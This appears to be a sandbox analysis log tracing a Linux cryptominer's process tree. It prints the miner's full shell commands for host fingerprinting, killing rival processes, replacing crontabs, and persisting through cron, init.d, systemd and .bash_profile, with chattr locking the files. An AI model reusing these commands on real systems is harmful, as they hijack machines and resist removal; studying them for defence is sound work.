/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"3⤵PID:3633
-
/usr/bin/idid -u4⤵PID:3634
-
-
-
-
/bin/klibsystem5./klibsystem51⤵PID:1768
-
/bin/hostnamehostname -I1⤵PID:1834
-
/usr/bin/awkawk "{print \$1}"1⤵PID:1836
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:1841
-
/usr/bin/headhead -n 11⤵PID:1840
-
/bin/grepgrep "Port "1⤵PID:1839
-
/bin/catcat /etc/ssh/sshd_config1⤵PID:1838
-
/bin/sedsed -e "s/\$//"1⤵PID:1850
-
/bin/sedsed -e "s/^ *//"1⤵PID:1849
-
/usr/bin/cutcut -d: -f21⤵PID:1848
-
/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
PID:1847
-
/usr/bin/awkawk "{print \$1}"1⤵PID:1853
-
/usr/bin/awkawk "{print \$4}"1⤵PID:1856
-
/usr/bin/awkawk "{print \$4}"1⤵PID:1859
-
/bin/hostnamehostname -I1⤵
- Attempts to change immutable files
PID:2104
-
/usr/bin/awkawk "{print \$1}"1⤵PID:2106
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:2111
-
/usr/bin/headhead -n 11⤵PID:2110
-
/bin/grepgrep "Port "1⤵PID:2109
-
/bin/catcat /etc/ssh/sshd_config1⤵PID:2108
-
/bin/sedsed -e "s/\$//"1⤵PID:2120
-
/usr/bin/cutcut -d: -f21⤵PID:2118
-
/bin/sedsed -e "s/^ *//"1⤵PID:2119
-
/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
PID:2117
-
/usr/bin/awkawk "{print \$1}"1⤵PID:2123
-
/usr/bin/awkawk "{print \$4}"1⤵PID:2126
-
/usr/bin/awkawk "{print \$4}"1⤵PID:2129
-
/bin/grepgrep -- "-bash[[:space:]]*\$"1⤵PID:2152
-
/usr/bin/wcwc -l1⤵PID:2154
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"1⤵PID:2153
-
/bin/grepgrep -v grep1⤵PID:2151
-
/bin/psps aux1⤵PID:2150
-
/usr/bin/crontabcrontab -r1⤵PID:2171
-
/usr/bin/pkillpkill -f .klibsystem51⤵
- Reads CPU attributes
- Reads runtime system information
PID:2172
-
/usr/bin/pkillpkill -f .klibsystem41⤵PID:2173
-
/bin/bashbash -c "echo \"* * * * * /dev/shm/.klibsystem5 >/dev/null 2>&1\" | crontab -"1⤵PID:2174
-
/usr/bin/crontabcrontab -2⤵PID:2176
-
-
/tmp/sys-helper/tmp/sys-helper1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:2177
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:2178 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵PID:2179
-
/usr/bin/whoamiwhoami3⤵PID:2190
-
-
/bin/hostnamehostname3⤵PID:2191
-
-
/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
PID:2192
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:2208
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵PID:2210
-
-
/bin/psps -A "-ostat,ppid"3⤵PID:2209
-
-
/usr/bin/idid -u3⤵PID:2212
-
-
/bin/grepgrep -v grep3⤵PID:2215
-
-
/bin/grepgrep /etc/cron3⤵PID:2214
-
-
/bin/psps x3⤵
- Reads runtime system information
PID:2213
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"2⤵
- Writes file to tmp directory
PID:2217 -
/usr/bin/idid -u3⤵PID:2218
-
-
/usr/bin/idid -u3⤵PID:2219
-
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"3⤵PID:2220
-
-
/bin/rmrm -rf /bin/bprofr3⤵PID:2221
-
-
/bin/sedsed -i /bprofr/d "~/.bash_profile"3⤵PID:2222
-
-
/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr3⤵
- Writes file to system bin folder
PID:2223
-
-
/usr/bin/idid -u3⤵PID:2224
-
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"3⤵
- Attempts to change immutable files
PID:2225
-
-
/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly3⤵PID:2226
-
-
/usr/bin/chattrchattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵PID:2227
-
-
/bin/rmrm -rf /bin/crondr3⤵PID:2228
-
-
/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr3⤵
- Writes file to system bin folder
PID:2229
-
-
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig3⤵
- Creates/modifies Cron job
PID:2231
-
-
/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig3⤵
- Creates/modifies Cron job
PID:2232
-
-
/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵PID:2233
-
-
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵PID:2234
-
-
/usr/bin/whichwhich chkconfig3⤵PID:2235
-
-
/usr/bin/whichwhich update-rc.d3⤵PID:2236
-
-
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr3⤵
- Attempts to change immutable files
PID:2237
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable3⤵
- Flushes firewall rules
PID:2238 -
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:2239
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:2239
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:2239
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵PID:2239
-
-
/sbin/systemctlsystemctl daemon-reload4⤵PID:2239
-
-
/bin/systemctlsystemctl daemon-reload4⤵PID:2239
-
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove3⤵PID:2260
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:2261
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:2261
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:2261
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵PID:2261
-
-
/sbin/systemctlsystemctl daemon-reload4⤵PID:2261
-
-
/bin/systemctlsystemctl daemon-reload4⤵PID:2261
-
-
-
/bin/rmrm -rf /bin/initdr3⤵PID:2282
-
-
/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr3⤵
- Writes file to system bin folder
PID:2283
-
-
/usr/bin/teetee /etc/init.d/pwnrig3⤵
- Modifies init.d
PID:2285
-
-
/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig3⤵
- Modifies init.d
PID:2286
-
-
/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr3⤵PID:2287
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults3⤵PID:2288
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:2289
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:2289
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:2289
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵PID:2289
-
-
/sbin/systemctlsystemctl daemon-reload4⤵PID:2289
-
-
/bin/systemctlsystemctl daemon-reload4⤵PID:2289
-
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig enable3⤵PID:2310
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:2311
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:2311
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:2311
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵PID:2311
-
-
/sbin/systemctlsystemctl daemon-reload4⤵PID:2311
-
-
/bin/systemctlsystemctl daemon-reload4⤵PID:2311
-
-
-
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr3⤵PID:2332
-
-
/usr/bin/whichwhich systemctl3⤵PID:2333
-
-
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr3⤵PID:2334
-
-
/bin/rmrm -rf /bin/sysdr3⤵PID:2335
-
-
/bin/cpcp -f -r -- /tmp/service-agent /bin/sysdr3⤵
- Writes file to system bin folder
PID:2336
-
-
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service3⤵
- Modifies systemd
PID:2338
-
-
/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service3⤵
- Attempts to change immutable files
PID:2339
-
-
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr3⤵PID:2340
-
-
/bin/systemctlsystemctl enable pwnrige.service3⤵PID:2341
-
-
/bin/systemctlsystemctl enable pwnrigl.service3⤵PID:2362
-
-
/bin/systemctlsystemctl daemon-reload3⤵PID:2383
-
-
/bin/systemctlsystemctl reload-or-restart pwnrige.service3⤵PID:2404
-
-
-
/bin/hostnamehostname -I1⤵PID:2182
-
/usr/bin/awkawk "{print \$1}"1⤵PID:2184
-
/bin/grepgrep "Port "1⤵PID:2187
-
/bin/catcat /etc/ssh/sshd_config1⤵PID:2186
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:2189
-
/usr/bin/headhead -n 11⤵PID:2188
-
/bin/sedsed -e "s/\$//"1⤵PID:2198
-
/bin/sedsed -e "s/^ *//"1⤵PID:2197
-
/usr/bin/cutcut -d: -f21⤵PID:2196
-
/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
PID:2195
-
/usr/bin/awkawk "{print \$1}"1⤵PID:2201
-
/usr/bin/awkawk "{print \$4}"1⤵PID:2204
-
/usr/bin/awkawk "{print \$4}"1⤵PID:2207
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:2446 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵PID:2470
-
/usr/bin/whoamiwhoami3⤵PID:2481
-
-
/bin/hostnamehostname3⤵PID:2482
-
-
/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
PID:2483
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:2499
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵PID:2501
-
-
/bin/psps -A "-ostat,ppid"3⤵
- Reads runtime system information
PID:2500
-
-
/usr/bin/idid -u3⤵PID:2503
-
-
/bin/grepgrep -v grep3⤵PID:2506
-
-
/bin/grepgrep /etc/cron3⤵PID:2505
-
-
/bin/psps x3⤵
- Reads CPU attributes
PID:2504
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:2508
-
/usr/bin/idid -u3⤵PID:2509
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"3⤵PID:2514
-
-
/bin/grepgrep -v /usr/sbin/httpd3⤵PID:2513
-
-
/bin/grepgrep -v -- "-bash[[:space:]]*\$"3⤵PID:2512
-
-
/bin/grepgrep -v grep3⤵PID:2511
-
-
/bin/psps aux3⤵PID:2510
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"2⤵PID:2516
-
/usr/bin/idid -u3⤵PID:2517
-
-
-
/bin/hostnamehostname -I1⤵
- Attempts to change immutable files
PID:2473
-
/usr/bin/awkawk "{print \$1}"1⤵PID:2475
-
/bin/grepgrep "Port "1⤵PID:2478
-
/usr/bin/headhead -n 11⤵PID:2479
-
/bin/catcat /etc/ssh/sshd_config1⤵PID:2477
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:2480
-
/bin/sedsed -e "s/\$//"1⤵PID:2489
-
/bin/sedsed -e "s/^ *//"1⤵PID:2488
-
/usr/bin/cutcut -d: -f21⤵PID:2487
-
/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
PID:2486
-
/usr/bin/awkawk "{print \$1}"1⤵PID:2492
-
/usr/bin/awkawk "{print \$4}"1⤵PID:2495
-
/usr/bin/awkawk "{print \$4}"1⤵PID:2498
-
/usr/bin/wcwc -l1⤵PID:2523
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"1⤵PID:2522
-
/bin/grepgrep -- "-bash[[:space:]]*\$"1⤵PID:2521
-
/bin/grepgrep -v grep1⤵PID:2520
-
/bin/psps aux1⤵
- Reads CPU attributes
- Reads runtime system information
PID:2519
-
/usr/bin/crontabcrontab -r1⤵PID:2529
-
/usr/bin/pkillpkill -f .klibsystem51⤵
- Reads runtime system information
PID:2530
-
/usr/bin/pkillpkill -f .klibsystem41⤵PID:2531
-
/bin/bashbash -c "echo \"* * * * * /usr/local/share/.klibsystem5 >/dev/null 2>&1\" | crontab -"1⤵PID:2532
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2534
-
-
/usr/bin/chattrchattr -ia /etc/cron.d/.lib-knlib41⤵PID:2535
-
/usr/bin/chattrchattr +ia /etc/cron.d/.lib-knlib41⤵PID:2536
-
/usr/bin/chattrchattr -ia /var/spool/cron/.lib-knlib41⤵PID:2537
-
/usr/bin/chattrchattr +ia /var/spool/cron/.lib-knlib41⤵PID:2538
-
/usr/bin/chattrchattr -ia /etc/cron.hourly/.lib-knlib41⤵PID:2539
-
/usr/bin/chattrchattr +ia /etc/cron.hourly/.lib-knlib41⤵PID:2540
-
/usr/bin/chattrchattr -ia /etc/cron.daily/.lib-knlib41⤵PID:2541
-
/usr/bin/chattrchattr +ia /etc/cron.daily/.lib-knlib41⤵PID:2542
-
/usr/bin/chattrchattr -ia /etc/cron.weekly/.lib-knlib41⤵PID:2543
-
/usr/bin/chattrchattr +ia /etc/cron.weekly/.lib-knlib41⤵PID:2544
-
/usr/bin/chattrchattr -ia /etc/cron.monthly/.lib-knlib41⤵PID:2545
-
/usr/bin/chattrchattr +ia /etc/cron.monthly/.lib-knlib41⤵PID:2546
-
/usr/bin/chattrchattr -ia /etc/anacrontab1⤵
- Attempts to change immutable files
PID:2547
-
/usr/bin/chattrchattr +ia /etc/anacrontab1⤵PID:2548
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:2549 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ 